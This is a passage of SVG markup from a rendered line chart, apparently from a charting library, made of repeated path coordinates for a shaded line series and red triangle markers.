114.54753416518123 253.70560868571428 L 116.52317290552585 253.70560868571428 L 118.49881164587048 253.70560868571428 L 120.4744503862151 253.70560868571428 L 122.45008912655972 253.70560868571428 L 124.42572786690435 253.70560868571428 L 126.40136660724897 253.70560868571428 L 128.3770053475936 253.70560868571428 L 130.35264408793822 253.70560868571428 L 132.32828282828285 253.70560868571428 L 134.3039215686275 253.70560868571428 L 136.2795603089721 253.70560868571428 L 138.25519904931673 253.70560868571428 L 140.23083778966134 253.70560868571428 L 142.20647653000597 253.70560868571428 L 144.18211527035058 253.70560868571428 L 146.15775401069521 253.70560868571428 L 148.13339275103985 253.70560868571428 L 150.10903149138446 253.70560868571428 L 152.0846702317291 253.70560868571428 L 154.0603089720737 253.70560868571428 L 156.03594771241833 253.70560868571428 L 158.01158645276294 253.70560868571428 L 159.98722519310758 253.70560868571428 L 161.96286393345218 253.38745097142856 L 163.93850267379682 253.38745097142856 L 165.91414141414145 253.38745097142856 L 167.88978015448606 253.19834925714287 L 169.8654188948307 253.122624 L 171.8410576351753 253.122624 L 173.81669637551994 253.122624 L 175.79233511586455 253.122624 L 177.76797385620918 252.9761801142857 L 179.74361259655382 251.63063177142857 L 181.71925133689842 251.0025366857143 L 183.69489007724306 251.0025366857143 L 185.67052881758767 251.0025366857143 L 187.6461675579323 251.0025366857143 L 189.6218062982769 251.0025366857143 L 191.59744503862154 250.9618149790477 L 193.57308377896615 250.92497566476197 L 195.5487225193108 250.90413726476197 L 197.52436125965542 250.90413726476197 L 199.50000000000003 250.90413726476197 L 201.47563874034466 250.90413726476197 L 203.45127748068927 250.3603768076191 L 205.4269162210339 249.5360590933334 L 207.4025549613785 248.71270549333337 L 209.37819370172315 248.62111463619053 L 211.35383244206778 248.62111463619053 L 213.3294711824124 248.62111463619053 L 215.30510992275703 248.62111463619053 L 217.28074866310163 248.62111463619053 L 219.25638740344627 248.62111463619053 L 221.23202614379088 248.52932644571445 L 223.2076648841355 248.52932644571445 L 225.18330362448012 248.4526709028573 L 227.15894236482475 247.70860583619054 L 229.1345811051694 246.9261549257143 L 231.110219845514 246.78001549714287 L 233.08585858585863 246.75669633523805 L 235.06149732620324 246.0712110780952 L 237.03713606654787 245.4850295923809 L 239.01277480689248 245.4850295923809 L 240.98841354723712 245.4850295923809 L 242.96405228758175 245.44182712380945 L 244.93969102792636 245.44182712380945 L 246.915329768271 245.44182712380945 L 248.8909685086156 245.44182712380945 L 250.86660724896024 245.29335352380946 L 252.84224598930484 244.99737043809517 L 254.81788472964945 244.8720355809523 L 256.79352346999406 244.8720355809523 L 258.7691622103387 244.8720355809523 L 260.7448009506833 244.8720355809523 L 262.72043969102793 244.6001553523809 L 264.69607843137254 244.52977500952375 L 266.6717171717172 244.52977500952375 L 268.6473559120618 244.52977500952375 L 270.6229946524064 244.45442186666662 L 272.598633392751 244.45442186666662 L 274.5742721330957 244.45442186666662 L 276.5499108734403 244.45442186666662 L 278.5255496137849 244.45442186666662 L 280.50118835412957 244.45442186666662 L 282.4768270944742 244.45442186666662 L 284.4524658348188 244.2866659809523 L 286.4281045751634 244.2866659809523 L 288.40374331550805 244.20760860952376 L 290.37938205585266 244.20760860952376 L 292.35502079619727 243.95790300952376 L 294.33065953654193 243.90878392380947 L 296.30629827688654 243.86558145523804 L 298.28193701723114 243.64353183999984 L 300.25757575757575 243.64353183999984 L 302.2332144979204 241.8117146971427 L 304.208853238265 239.9702564114284 L 306.1844919786096 238.78632406857125 L 308.1601307189543 238.59877846857125 L 310.1357694592989 238.59877846857125 L 312.1114081996435 238.59877846857125 L 314.0870469399881 237.20659743999983 L 316.0626856803328 234.56492429714268 L 318.0383244206774 232.56342303999983 L 320.013963161022 230.73160589714269 L 321.98960190136665 230.4435894399998 L 323.96524064171126 230.2697748571427 L 325.94087938205587 228.47459405714267 L 327.9165181224005 226.89344662857124 L 329.89215686274514 226.62440799999982 L 331.86779560308975 226.45963579428553 L 333.84343434343435 226.38528735999984 L 335.81907308377896 226.31880294095214 L 337.7947118241236 226.2607531123807 L 339.77035056446823 226.06185238857125 L 341.74598930481284 225.37717337904732 L 343.7216280451575 224.0129516647616 L 345.6972667855021 222.2365964647616 L 347.6729055258467 219.91993132190447 L 349.6485442661913 214.04847532190445 L 351.624183006536 211.8126435504759 L 353.5998217468806 206.31465497904733 L 355.5754604872252 203.9548640457134 L 357.55109922756986 198.28291204573034 L 359.52673796791447 198.28291204573034 L 361.5023767082591 198.28291204573034 L 363.4780154486037 198.28291204573034 L 365.45365418894835 198.28291204573034 L 367.42929292929296 198.28291204573034 L 369.40493166963756 198.1325102171589 L 371.3805704099822 197.34386473144463 L 373.35620915032683 197.2302007314446 L 375.33184789067144 195.8052398171589 L 377.30748663101605 194.52296781715887 L 379.2831253713607 192.98616964573034 L 381.2587641117053 192.8242999314446 L 383.2344028520499 192.60024992001604 L 385.2100415923946 191.1540784914446 L 387.1856803327392 189.42252923430175 L 389.1613190730838 187.41717152001604 L 391.1369578134284 185.1187230628732 L 393.1125965537731 184.76018474668268 L 395.0882352941177 184.4768569295398" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.70560868571428 L 86.88859180035651 253.70560868571428 L 88.86423054070113 253.70560868571428 L 90.83986928104575 253.70560868571428 L 92.81550802139039 253.70560868571428 L 94.791146761735 253.70560868571428 L 96.76678550207963 253.70560868571428 L 98.74242424242425 253.70560868571428 L 100.71806298276887 253.70560868571428 L 102.69370172311349 253.70560868571428 L 104.66934046345811 253.70560868571428 L 106.64497920380273 253.70560868571428 L 108.62061794414737 253.70560868571428 L 110.59625668449199 253.70560868571428 L 112.57189542483661 253.70560868571428 L 114.54753416518123 253.70560868571428 L 116.52317290552585 253.70560868571428 L 118.49881164587048 253.70560868571428 L 120.4744503862151 253.70560868571428 L 122.45008912655972 253.70560868571428 L 124.42572786690435 253.70560868571428 L 126.40136660724897 253.70560868571428 L 128.3770053475936 253.70560868571428 L 130.35264408793822 253.70560868571428 L 132.32828282828285 253.70560868571428 L 134.3039215686275 253.70560868571428 L 136.2795603089721 253.70560868571428 L 138.25519904931673 253.70560868571428 L 140.23083778966134 253.70560868571428 L 142.20647653000597 253.70560868571428 L 144.18211527035058 253.70560868571428 L 146.15775401069521 253.70560868571428 L 148.13339275103985 253.70560868571428 L 150.10903149138446 253.70560868571428 L 152.0846702317291 253.70560868571428 L 154.0603089720737 253.70560868571428 L 156.03594771241833 253.70560868571428 L 158.01158645276294 253.70560868571428 L 159.98722519310758 253.70560868571428 L 161.96286393345218 253.38745097142856 L 163.93850267379682 253.38745097142856 L 165.91414141414145 253.38745097142856 L 167.88978015448606 253.19834925714287 L 169.8654188948307 253.122624 L 171.8410576351753 253.122624 L 173.81669637551994 253.122624 L 175.79233511586455 253.122624 L 177.76797385620918 252.9761801142857 L 179.74361259655382 251.63063177142857 L 181.71925133689842 251.0025366857143 L 183.69489007724306 251.0025366857143 L 185.67052881758767 251.0025366857143 L 187.6461675579323 251.0025366857143 L 189.6218062982769 251.0025366857143 L 191.59744503862154 250.9618149790477 L 193.57308377896615 250.92497566476197 L 195.5487225193108 250.90413726476197 L 197.52436125965542 250.90413726476197 L 199.50000000000003 250.90413726476197 L 201.47563874034466 250.90413726476197 L 203.45127748068927 250.3603768076191 L 205.4269162210339 249.5360590933334 L 207.4025549613785 248.71270549333337 L 209.37819370172315 248.62111463619053 L 211.35383244206778 248.62111463619053 L 213.3294711824124 248.62111463619053 L 215.30510992275703 248.62111463619053 L 217.28074866310163 248.62111463619053 L 219.25638740344627 248.62111463619053 L 221.23202614379088 248.52932644571445 L 223.2076648841355 248.52932644571445 L 225.18330362448012 248.4526709028573 L 227.15894236482475 247.70860583619054 L 229.1345811051694 246.9261549257143 L 231.110219845514 246.78001549714287 L 233.08585858585863 246.75669633523805 L 235.06149732620324 246.0712110780952 L 237.03713606654787 245.4850295923809 L 239.01277480689248 245.4850295923809 L 240.98841354723712 245.4850295923809 L 242.96405228758175 245.44182712380945 L 244.93969102792636 245.44182712380945 L 246.915329768271 245.44182712380945 L 248.8909685086156 245.44182712380945 L 250.86660724896024 245.29335352380946 L 252.84224598930484 244.99737043809517 L 254.81788472964945 244.8720355809523 L 256.79352346999406 244.8720355809523 L 258.7691622103387 244.8720355809523 L 260.7448009506833 244.8720355809523 L 262.72043969102793 244.6001553523809 L 264.69607843137254 244.52977500952375 L 266.6717171717172 244.52977500952375 L 268.6473559120618 244.52977500952375 L 270.6229946524064 244.45442186666662 L 272.598633392751 244.45442186666662 L 274.5742721330957 244.45442186666662 L 276.5499108734403 244.45442186666662 L 278.5255496137849 244.45442186666662 L 280.50118835412957 244.45442186666662 L 282.4768270944742 244.45442186666662 L 284.4524658348188 244.2866659809523 L 286.4281045751634 244.2866659809523 L 288.40374331550805 244.20760860952376 L 290.37938205585266 244.20760860952376 L 292.35502079619727 243.95790300952376 L 294.33065953654193 243.90878392380947 L 296.30629827688654 243.86558145523804 L 298.28193701723114 243.64353183999984 L 300.25757575757575 243.64353183999984 L 302.2332144979204 241.8117146971427 L 304.208853238265 239.9702564114284 L 306.1844919786096 238.78632406857125 L 308.1601307189543 238.59877846857125 L 310.1357694592989 238.59877846857125 L 312.1114081996435 238.59877846857125 L 314.0870469399881 237.20659743999983 L 316.0626856803328 234.56492429714268 L 318.0383244206774 232.56342303999983 L 320.013963161022 230.73160589714269 L 321.98960190136665 230.4435894399998 L 323.96524064171126 230.2697748571427 L 325.94087938205587 228.47459405714267 L 327.9165181224005 226.89344662857124 L 329.89215686274514 226.62440799999982 L 331.86779560308975 226.45963579428553 L 333.84343434343435 226.38528735999984 L 335.81907308377896 226.31880294095214 L 337.7947118241236 226.2607531123807 L 339.77035056446823 226.06185238857125 L 341.74598930481284 225.37717337904732 L 343.7216280451575 224.0129516647616 L 345.6972667855021 222.2365964647616 L 347.6729055258467 219.91993132190447 L 349.6485442661913 214.04847532190445 L 351.624183006536 211.8126435504759 L 353.5998217468806 206.31465497904733 L 355.5754604872252 203.9548640457134 L 357.55109922756986 198.28291204573034 L 359.52673796791447 198.28291204573034 L 361.5023767082591 198.28291204573034 L 363.4780154486037 198.28291204573034 L 365.45365418894835 198.28291204573034 L 367.42929292929296 198.28291204573034 L 369.40493166963756 198.1325102171589 L 371.3805704099822 197.34386473144463 L 373.35620915032683 197.2302007314446 L 375.33184789067144 195.8052398171589 L 377.30748663101605 194.52296781715887 L 379.2831253713607 192.98616964573034 L 381.2587641117053 192.8242999314446 L 383.2344028520499 192.60024992001604 L 385.2100415923946 191.1540784914446 L 387.1856803327392 189.42252923430175 L 389.1613190730838 187.41717152001604 L 391.1369578134284 185.1187230628732 L 393.1125965537731 184.76018474668268 L 395.0882352941177 184.4768569295398" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.70560868571428 L 86.88859180035651 253.70560868571428 L 88.86423054070113 253.70560868571428 L 90.83986928104575 253.70560868571428 L 92.81550802139039 253.70560868571428 L 94.791146761735 253.70560868571428 L 96.76678550207963 253.70560868571428 L 98.74242424242425 253.70560868571428 L 100.71806298276887 253.70560868571428 L 102.69370172311349 253.70560868571428 L 104.66934046345811 253.70560868571428 L 106.64497920380273 253.70560868571428 L 108.62061794414737 253.70560868571428 L 110.59625668449199 253.70560868571428 L 112.57189542483661 253.70560868571428 L 114.54753416518123 253.70560868571428 L 116.52317290552585 253.70560868571428 L 118.49881164587048 253.70560868571428 L 120.4744503862151 253.70560868571428 L 122.45008912655972 253.70560868571428 L 124.42572786690435 253.70560868571428 L 126.40136660724897 253.70560868571428 L 128.3770053475936 253.70560868571428 L 130.35264408793822 253.70560868571428 L 132.32828282828285 253.70560868571428 L 134.3039215686275 253.70560868571428 L 136.2795603089721 253.70560868571428 L 138.25519904931673 253.70560868571428 L 140.23083778966134 253.70560868571428 L 142.20647653000597 253.70560868571428 L 144.18211527035058 253.70560868571428 L 146.15775401069521 253.70560868571428 L 148.13339275103985 253.70560868571428 L 150.10903149138446 253.70560868571428 L 152.0846702317291 253.70560868571428 L 154.0603089720737 253.70560868571428 L 156.03594771241833 253.70560868571428 L 158.01158645276294 253.70560868571428 L 159.98722519310758 253.70560868571428 L 161.96286393345218 253.38745097142856 L 163.93850267379682 253.38745097142856 L 165.91414141414145 253.38745097142856 L 167.88978015448606 253.19834925714287 L 169.8654188948307 253.122624 L 171.8410576351753 253.122624 L 173.81669637551994 253.122624 L 175.79233511586455 253.122624 L 177.76797385620918 252.9761801142857 L 179.74361259655382 251.63063177142857 L 181.71925133689842 251.0025366857143 L 183.69489007724306 251.0025366857143 L 185.67052881758767 251.0025366857143 L 187.6461675579323 251.0025366857143 L 189.6218062982769 251.0025366857143 L 191.59744503862154 250.9618149790477 L 193.57308377896615 250.92497566476197 L 195.5487225193108 250.90413726476197 L 197.52436125965542 250.90413726476197 L 199.50000000000003 250.90413726476197 L 201.47563874034466 250.90413726476197 L 203.45127748068927 250.3603768076191 L 205.4269162210339 249.5360590933334 L 207.4025549613785 248.71270549333337 L 209.37819370172315 248.62111463619053 L 211.35383244206778 248.62111463619053 L 213.3294711824124 248.62111463619053 L 215.30510992275703 248.62111463619053 L 217.28074866310163 248.62111463619053 L 219.25638740344627 248.62111463619053 L 221.23202614379088 248.52932644571445 L 223.2076648841355 248.52932644571445 L 225.18330362448012 248.4526709028573 L 227.15894236482475 247.70860583619054 L 229.1345811051694 246.9261549257143 L 231.110219845514 246.78001549714287 L 233.08585858585863 246.75669633523805 L 235.06149732620324 246.0712110780952 L 237.03713606654787 245.4850295923809 L 239.01277480689248 245.4850295923809 L 240.98841354723712 245.4850295923809 L 242.96405228758175 245.44182712380945 L 244.93969102792636 245.44182712380945 L 246.915329768271 245.44182712380945 L 248.8909685086156 245.44182712380945 L 250.86660724896024 245.29335352380946 L 252.84224598930484 244.99737043809517 L 254.81788472964945 244.8720355809523 L 256.79352346999406 244.8720355809523 L 258.7691622103387 244.8720355809523 L 260.7448009506833 244.8720355809523 L 262.72043969102793 244.6001553523809 L 264.69607843137254 244.52977500952375 L 266.6717171717172 244.52977500952375 L 268.6473559120618 244.52977500952375 L 270.6229946524064 244.45442186666662 L 272.598633392751 244.45442186666662 L 274.5742721330957 244.45442186666662 L 276.5499108734403 244.45442186666662 L 278.5255496137849 244.45442186666662 L 280.50118835412957 244.45442186666662 L 282.4768270944742 244.45442186666662 L 284.4524658348188 244.2866659809523 L 286.4281045751634 244.2866659809523 L 288.40374331550805 244.20760860952376 L 290.37938205585266 244.20760860952376 L 292.35502079619727 243.95790300952376 L 294.33065953654193 243.90878392380947 L 296.30629827688654 243.86558145523804 L 298.28193701723114 243.64353183999984 L 300.25757575757575 243.64353183999984 L 302.2332144979204 241.8117146971427 L 304.208853238265 239.9702564114284 L 306.1844919786096 238.78632406857125 L 308.1601307189543 238.59877846857125 L 310.1357694592989 238.59877846857125 L 312.1114081996435 238.59877846857125 L 314.0870469399881 237.20659743999983 L 316.0626856803328 234.56492429714268 L 318.0383244206774 232.56342303999983 L 320.013963161022 230.73160589714269 L 321.98960190136665 230.4435894399998 L 323.96524064171126 230.2697748571427 L 325.94087938205587 228.47459405714267 L 327.9165181224005 226.89344662857124 L 329.89215686274514 226.62440799999982 L 331.86779560308975 226.45963579428553 L 333.84343434343435 226.38528735999984 L 335.81907308377896 226.31880294095214 L 337.7947118241236 226.2607531123807 L 339.77035056446823 226.06185238857125 L 341.74598930481284 225.37717337904732 L 343.7216280451575 224.0129516647616 L 345.6972667855021 222.2365964647616 L 347.6729055258467 219.91993132190447 L 349.6485442661913 214.04847532190445 L 351.624183006536 211.8126435504759 L 353.5998217468806 206.31465497904733 L 355.5754604872252 203.9548640457134 L 357.55109922756986 198.28291204573034 L 359.52673796791447 198.28291204573034 L 361.5023767082591 198.28291204573034 L 363.4780154486037 198.28291204573034 L 365.45365418894835 198.28291204573034 L 367.42929292929296 198.28291204573034 L 369.40493166963756 198.1325102171589 L 371.3805704099822 197.34386473144463 L 373.35620915032683 197.2302007314446 L 375.33184789067144 195.8052398171589 L 377.30748663101605 194.52296781715887 L 379.2831253713607 192.98616964573034 L 381.2587641117053 192.8242999314446 L 383.2344028520499 192.60024992001604 L 385.2100415923946 191.1540784914446 L 387.1856803327392 189.42252923430175 L 389.1613190730838 187.41717152001604 L 391.1369578134284 185.1187230628732 L 393.1125965537731 184.76018474668268 L 395.0882352941177 184.4768569295398" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.70560868571428 L 86.88859180035651 253.70560868571428 L 88.86423054070113 253.70560868571428 L 90.83986928104575 253.70560868571428 L 92.81550802139039 253.70560868571428 L 94.791146761735 253.70560868571428 L 96.76678550207963 253.70560868571428 L 98.74242424242425 253.70560868571428 L 100.71806298276887 253.70560868571428 L 102.69370172311349 253.70560868571428 L 104.66934046345811 253.70560868571428 L 106.64497920380273 253.70560868571428 L 108.62061794414737 253.70560868571428 L 110.59625668449199 253.70560868571428 L 112.57189542483661 253.70560868571428 L 114.54753416518123 253.70560868571428 L 116.52317290552585 253.70560868571428 L 118.49881164587048 253.70560868571428 L 120.4744503862151 253.70560868571428 L 122.45008912655972 253.70560868571428 L 124.42572786690435 253.70560868571428 L 126.40136660724897 253.70560868571428 L 128.3770053475936 253.70560868571428 L 130.35264408793822 253.70560868571428 L 132.32828282828285 253.70560868571428 L 134.3039215686275 253.70560868571428 L 136.2795603089721 253.70560868571428 L 138.25519904931673 253.70560868571428 L 140.23083778966134 253.70560868571428 L 142.20647653000597 253.70560868571428 L 144.18211527035058 253.70560868571428 L 146.15775401069521 253.70560868571428 L 148.13339275103985 253.70560868571428 L 150.10903149138446 253.70560868571428 L 152.0846702317291 253.70560868571428 L 154.0603089720737 253.70560868571428 L 156.03594771241833 253.70560868571428 L 158.01158645276294 253.70560868571428 L 159.98722519310758 253.70560868571428 L 161.96286393345218 253.38745097142856 L 163.93850267379682 253.38745097142856 L 165.91414141414145 253.38745097142856 L 167.88978015448606 253.19834925714287 L 169.8654188948307 253.122624 L 171.8410576351753 253.122624 L 173.81669637551994 253.122624 L 175.79233511586455 253.122624 L 177.76797385620918 252.9761801142857 L 179.74361259655382 251.63063177142857 L 181.71925133689842 251.0025366857143 L 183.69489007724306 251.0025366857143 L 185.67052881758767 251.0025366857143 L 187.6461675579323 251.0025366857143 L 189.6218062982769 251.0025366857143 L 191.59744503862154 250.9618149790477 L 193.57308377896615 250.92497566476197 L 195.5487225193108 250.90413726476197 L 197.52436125965542 250.90413726476197 L 199.50000000000003 250.90413726476197 L 201.47563874034466 250.90413726476197 L 203.45127748068927 250.3603768076191 L 205.4269162210339 249.5360590933334 L 207.4025549613785 248.71270549333337 L 209.37819370172315 248.62111463619053 L 211.35383244206778 248.62111463619053 L 213.3294711824124 248.62111463619053 L 215.30510992275703 248.62111463619053 L 217.28074866310163 248.62111463619053 L 219.25638740344627 248.62111463619053 L 221.23202614379088 248.52932644571445 L 223.2076648841355 248.52932644571445 L 225.18330362448012 248.4526709028573 L 227.15894236482475 247.70860583619054 L 229.1345811051694 246.9261549257143 L 231.110219845514 246.78001549714287 L 233.08585858585863 246.75669633523805 L 235.06149732620324 246.0712110780952 L 237.03713606654787 245.4850295923809 L 239.01277480689248 245.4850295923809 L 240.98841354723712 245.4850295923809 L 242.96405228758175 245.44182712380945 L 244.93969102792636 245.44182712380945 L 246.915329768271 245.44182712380945 L 248.8909685086156 245.44182712380945 L 250.86660724896024 245.29335352380946 L 252.84224598930484 244.99737043809517 L 254.81788472964945 244.8720355809523 L 256.79352346999406 244.8720355809523 L 258.7691622103387 244.8720355809523 L 260.7448009506833 244.8720355809523 L 262.72043969102793 244.6001553523809 L 264.69607843137254 244.52977500952375 L 266.6717171717172 244.52977500952375 L 268.6473559120618 244.52977500952375 L 270.6229946524064 244.45442186666662 L 272.598633392751 244.45442186666662 L 274.5742721330957 244.45442186666662 L 276.5499108734403 244.45442186666662 L 278.5255496137849 244.45442186666662 L 280.50118835412957 244.45442186666662 L 282.4768270944742 244.45442186666662 L 284.4524658348188 244.2866659809523 L 286.4281045751634 244.2866659809523 L 288.40374331550805 244.20760860952376 L 290.37938205585266 244.20760860952376 L 292.35502079619727 243.95790300952376 L 294.33065953654193 243.90878392380947 L 296.30629827688654 243.86558145523804 L 298.28193701723114 243.64353183999984 L 300.25757575757575 243.64353183999984 L 302.2332144979204 241.8117146971427 L 304.208853238265 239.9702564114284 L 306.1844919786096 238.78632406857125 L 308.1601307189543 238.59877846857125 L 310.1357694592989 238.59877846857125 L 312.1114081996435 238.59877846857125 L 314.0870469399881 237.20659743999983 L 316.0626856803328 234.56492429714268 L 318.0383244206774 232.56342303999983 L 320.013963161022 230.73160589714269 L 321.98960190136665 230.4435894399998 L 323.96524064171126 230.2697748571427 L 325.94087938205587 228.47459405714267 L 327.9165181224005 226.89344662857124 L 329.89215686274514 226.62440799999982 L 331.86779560308975 226.45963579428553 L 333.84343434343435 226.38528735999984 L 335.81907308377896 226.31880294095214 L 337.7947118241236 226.2607531123807 L 339.77035056446823 226.06185238857125 L 341.74598930481284 225.37717337904732 L 343.7216280451575 224.0129516647616 L 345.6972667855021 222.2365964647616 L 347.6729055258467 219.91993132190447 L 349.6485442661913 214.04847532190445 L 351.624183006536 211.8126435504759 L 353.5998217468806 206.31465497904733 L 355.5754604872252 203.9548640457134 L 357.55109922756986 198.28291204573034 L 359.52673796791447 198.28291204573034 L 361.5023767082591 198.28291204573034 L 363.4780154486037 198.28291204573034 L 365.45365418894835 198.28291204573034 L 367.42929292929296 198.28291204573034 L 369.40493166963756 198.1325102171589 L 371.3805704099822 197.34386473144463 L 373.35620915032683 197.2302007314446 L 375.33184789067144 195.8052398171589 L 377.30748663101605 194.52296781715887 L 379.2831253713607 192.98616964573034 L 381.2587641117053 192.8242999314446 L 383.2344028520499 192.60024992001604 L 385.2100415923946 191.1540784914446 L 387.1856803327392 189.42252923430175 L 389.1613190730838 187.41717152001604 L 391.1369578134284 185.1187230628732 L 393.1125965537731 184.76018474668268 L 395.0882352941177 184.4768569295398" fill="none" stroke="#DF5353" stroke-width="2"></path><path d="M 395 179.18 L 399 187.18 391 187.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 393 179.68 L 397 187.68 389 187.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 391 179.68 L 395 187.68 387 187.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 389 182.18 L 393 190.18 385 190.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 387 184.18 L 391 192.18 383 192.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 385 185.68 L 389 193.68 381 193.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 383 187.18 L 387 195.18 379 195.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 187.68 L 385.5 195.68 377.5 195.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 379.5 187.68 L 383.5 195.68 375.5 195.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 377.5 189.18 L 381.5 197.18 373.5 197.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 375.5 190.68 L 379.5 198.68 371.5 198.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 191.68 L 377.5 199.68 369.5 199.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 371.5 192.18 L 375.5 200.18 367.5 200.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 369.5 192.68 L 373.5 200.68 365.5 200.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 193.18 L 371.5 201.18 363.5 201.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 365.5 193.18 L 369.5 201.18 361.5 201.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 363.5 193.18 L 367.5 201.18 359.5 201.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 193.18 L 365.5 201.18 357.5 201.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 359.5 193.18 L 363.5 201.18 355.5 201.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 357.5 193.18 L 361.5 201.18 353.5 201.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 198.68 L 359.5 206.68 351.5 206.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 353.5 201.18 L 357.5 209.18 349.5 209.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 351.5 206.68 L 355.5 214.68 347.5 214.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 349.5 208.68 L 353.5 216.68 345.5 216.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 214.68 L 351.5 222.68 343.5 222.68 